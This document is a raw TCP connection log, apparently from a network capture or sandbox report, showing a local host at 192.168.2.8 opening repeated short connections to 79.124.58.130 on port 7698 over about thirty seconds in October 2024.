Oct 23, 2024 17:25:37.877939939 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.877966881 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.878000975 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.903398037 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.903419018 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.903431892 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.903439045 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.903477907 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.903477907 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.903505087 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.903537989 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.903563023 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.903580904 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.903620005 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.948031902 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.948096037 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.948107958 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.948131084 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.948163986 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.948302031 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.948302031 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.948318958 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.948365927 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.948537111 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.948548079 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.948585033 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.948592901 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.948605061 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.948652029 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.948873043 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.948916912 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.948926926 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.948939085 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.948975086 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.949022055 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.949033976 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.949069023 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.949620008 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.949630976 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.949667931 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.989645004 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.989667892 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.989826918 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.997338057 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.997379065 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.997391939 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.997412920 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.997457981 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.022723913 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.022753954 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.022767067 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.022792101 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.022874117 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.022936106 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.022947073 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.022947073 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.022948027 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.022985935 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.068264961 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.068316936 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.068334103 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.068455935 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.068455935 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.068455935 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.070116997 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.070182085 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.076858997 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.077130079 CEST	49706	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.082235098 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.083271027 CEST	7698	49706	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.083347082 CEST	49706	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.083517075 CEST	49706	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:38.088850975 CEST	7698	49706	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.969944000 CEST	7698	49706	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:38.970067978 CEST	49706	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:39.080604076 CEST	49706	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:39.080956936 CEST	49707	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:39.086385965 CEST	7698	49707	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:39.086489916 CEST	49707	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:39.086630106 CEST	49707	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:39.086857080 CEST	7698	49706	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:39.086946964 CEST	49706	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:39.092099905 CEST	7698	49707	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:39.967709064 CEST	7698	49707	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:39.967781067 CEST	49707	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:40.091054916 CEST	49707	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:40.094571114 CEST	49708	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:40.096895933 CEST	7698	49707	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:40.096961021 CEST	49707	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:40.099972010 CEST	7698	49708	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:40.100040913 CEST	49708	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:40.101891041 CEST	49708	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:40.107248068 CEST	7698	49708	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:40.996090889 CEST	7698	49708	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:40.996157885 CEST	49708	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:41.111902952 CEST	49708	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:41.112461090 CEST	49709	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:41.117681026 CEST	7698	49708	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:41.117755890 CEST	49708	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:41.117816925 CEST	7698	49709	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:41.118014097 CEST	49709	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:41.118092060 CEST	49709	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:41.123402119 CEST	7698	49709	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:42.007652998 CEST	7698	49709	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:42.007761002 CEST	49709	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:42.111808062 CEST	49709	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:42.112432957 CEST	49710	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:42.117624998 CEST	7698	49709	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:42.117835045 CEST	49709	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:42.118283033 CEST	7698	49710	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:42.118355036 CEST	49710	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:42.118772030 CEST	49710	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:42.124094963 CEST	7698	49710	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:43.012305021 CEST	7698	49710	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:43.012518883 CEST	49710	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:43.127588034 CEST	49710	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:43.127912045 CEST	49711	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:43.133352995 CEST	7698	49711	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:43.133373976 CEST	7698	49710	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:43.133474112 CEST	49710	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:43.133497000 CEST	49711	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:43.133676052 CEST	49711	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:43.138942003 CEST	7698	49711	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:44.025127888 CEST	7698	49711	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:44.025255919 CEST	49711	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:44.128423929 CEST	49711	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:44.128721952 CEST	49712	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:44.134012938 CEST	7698	49712	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:44.134126902 CEST	49712	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:44.134239912 CEST	49712	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:44.134241104 CEST	7698	49711	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:44.134368896 CEST	49711	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:44.139611006 CEST	7698	49712	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:45.024177074 CEST	7698	49712	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:45.024262905 CEST	49712	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:45.127609015 CEST	49712	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:45.127947092 CEST	49713	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:45.133268118 CEST	7698	49713	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:45.133338928 CEST	49713	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:45.133474112 CEST	49713	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:45.133506060 CEST	7698	49712	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:45.133572102 CEST	49712	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:45.138859987 CEST	7698	49713	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:46.034898996 CEST	7698	49713	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:46.035259008 CEST	49713	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:46.143388033 CEST	49713	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:46.143738985 CEST	49714	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:46.150058031 CEST	7698	49714	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:46.150141001 CEST	49714	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:46.150257111 CEST	49714	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:46.155853987 CEST	7698	49714	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:46.172799110 CEST	7698	49713	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:46.172940016 CEST	49713	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:47.104691029 CEST	7698	49714	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:47.104753971 CEST	49714	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:47.206255913 CEST	49714	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:47.212827921 CEST	7698	49714	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:47.212920904 CEST	49714	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:47.213243961 CEST	49715	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:47.218776941 CEST	7698	49715	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:47.218874931 CEST	49715	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:47.223903894 CEST	49715	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:47.229490042 CEST	7698	49715	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:48.111269951 CEST	7698	49715	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:48.111717939 CEST	49715	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:48.221307993 CEST	49715	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:48.221889019 CEST	49716	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:48.227370024 CEST	7698	49715	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:48.227487087 CEST	49715	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:48.227854967 CEST	7698	49716	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:48.227952957 CEST	49716	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:48.228116989 CEST	49716	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:48.237395048 CEST	7698	49716	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:49.120256901 CEST	7698	49716	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:49.120498896 CEST	49716	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:49.221601009 CEST	49716	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:49.221601009 CEST	49718	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:49.227092028 CEST	7698	49718	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:49.227241993 CEST	49718	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:49.227786064 CEST	7698	49716	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:49.227822065 CEST	49718	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:49.229641914 CEST	49716	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:49.233072042 CEST	7698	49718	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:50.115564108 CEST	7698	49718	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:50.115732908 CEST	49718	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:50.252708912 CEST	49718	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:50.253391027 CEST	49720	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:50.261217117 CEST	7698	49718	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:50.261337042 CEST	49718	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:50.261485100 CEST	7698	49720	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:50.261603117 CEST	49720	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:50.261828899 CEST	49720	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:50.269016027 CEST	7698	49720	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:51.148080111 CEST	7698	49720	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:51.151556015 CEST	49720	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:51.252490044 CEST	49720	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:51.252815962 CEST	49722	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:51.258608103 CEST	7698	49722	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:51.258647919 CEST	7698	49720	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:51.258723021 CEST	49720	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:51.258907080 CEST	49722	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:51.258907080 CEST	49722	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:51.264223099 CEST	7698	49722	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:52.151078939 CEST	7698	49722	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:52.151334047 CEST	49722	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:52.252456903 CEST	49722	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:52.252886057 CEST	49723	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:52.258126974 CEST	7698	49722	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:52.258253098 CEST	49722	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:52.258713961 CEST	7698	49723	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:52.258780003 CEST	49723	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:52.258929014 CEST	49723	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:52.264595985 CEST	7698	49723	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:53.159298897 CEST	7698	49723	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:53.159459114 CEST	49723	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:53.268038988 CEST	49723	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:53.268403053 CEST	49724	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:53.273715019 CEST	7698	49723	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:53.273770094 CEST	49723	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:53.273842096 CEST	7698	49724	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:53.273914099 CEST	49724	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:53.274023056 CEST	49724	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:53.279429913 CEST	7698	49724	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:54.174360991 CEST	7698	49724	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:54.174468040 CEST	49724	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:54.283979893 CEST	49724	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:54.284329891 CEST	49725	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:54.289962053 CEST	7698	49725	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:54.290112972 CEST	49725	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:54.290220976 CEST	7698	49724	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:54.290299892 CEST	49724	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:54.290596008 CEST	49725	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:54.296781063 CEST	7698	49725	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:55.194454908 CEST	7698	49725	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:55.194523096 CEST	49725	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:55.299361944 CEST	49725	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:55.299685001 CEST	49726	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:55.305691004 CEST	7698	49725	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:55.305717945 CEST	7698	49726	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:55.305804014 CEST	49725	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:55.305850029 CEST	49726	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:55.310811996 CEST	49726	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:55.316620111 CEST	7698	49726	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:56.198607922 CEST	7698	49726	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:56.198741913 CEST	49726	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:56.326241970 CEST	49726	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:56.326620102 CEST	49727	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:56.333178043 CEST	7698	49727	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:56.333283901 CEST	49727	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:56.333585024 CEST	49727	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:56.334846020 CEST	7698	49726	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:56.334909916 CEST	49726	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:56.339133024 CEST	7698	49727	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:57.433224916 CEST	7698	49727	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:57.433355093 CEST	49727	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:57.433415890 CEST	7698	49727	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:57.433428049 CEST	7698	49727	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:57.433466911 CEST	49727	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:57.433486938 CEST	49727	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:57.433551073 CEST	49727	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:57.439763069 CEST	7698	49727	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:57.549746990 CEST	49728	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:57.555222034 CEST	7698	49728	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:57.555321932 CEST	49728	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:57.555510044 CEST	49728	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:57.560939074 CEST	7698	49728	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:58.444996119 CEST	7698	49728	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:58.445115089 CEST	49728	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:58.588982105 CEST	7698	49728	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:58.589098930 CEST	49728	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:58.787255049 CEST	49728	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:58.792618990 CEST	7698	49728	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:58.893326044 CEST	49729	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:58.900444984 CEST	7698	49729	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:58.900530100 CEST	49729	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:58.900667906 CEST	49729	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:58.907814026 CEST	7698	49729	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:59.800971031 CEST	7698	49729	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:59.801063061 CEST	49729	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:59.908771038 CEST	49729	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:59.909153938 CEST	49730	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:59.914745092 CEST	7698	49730	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:59.914830923 CEST	49730	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:59.914968014 CEST	49730	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:59.915059090 CEST	7698	49729	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:59.915110111 CEST	49729	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:59.921607018 CEST	7698	49730	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:00.814533949 CEST	7698	49730	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:00.814683914 CEST	49730	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:00.926984072 CEST	49730	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:00.927577972 CEST	49731	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:00.933027029 CEST	7698	49730	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:00.933085918 CEST	49730	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:00.933890104 CEST	7698	49731	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:00.933955908 CEST	49731	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:00.934107065 CEST	49731	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:00.939591885 CEST	7698	49731	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:01.824476957 CEST	7698	49731	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:01.824559927 CEST	49731	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:01.956238985 CEST	49731	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:01.956845045 CEST	49732	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:01.962075949 CEST	7698	49731	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:01.962105036 CEST	7698	49732	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:01.962131023 CEST	49731	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:01.962176085 CEST	49732	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:01.962315083 CEST	49732	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:01.968067884 CEST	7698	49732	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:02.853286028 CEST	7698	49732	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:02.853389978 CEST	49732	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:02.986977100 CEST	49732	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:02.987432957 CEST	49733	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:02.992841005 CEST	7698	49733	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:02.992976904 CEST	49733	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:02.993033886 CEST	7698	49732	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:02.993086100 CEST	49732	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:02.993199110 CEST	49733	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:02.998555899 CEST	7698	49733	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:03.881383896 CEST	7698	49733	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:03.881705999 CEST	49733	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:04.002650023 CEST	49733	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:04.003114939 CEST	49734	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:04.008559942 CEST	7698	49734	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:04.008630037 CEST	49734	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:04.008845091 CEST	49734	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:26:04.009366989 CEST	7698	49733	79.124.58.130	192.168.2.8
Oct 23, 2024 17:26:04.009495974 CEST	49733	7698	192.168.2.8	79.124.58.130
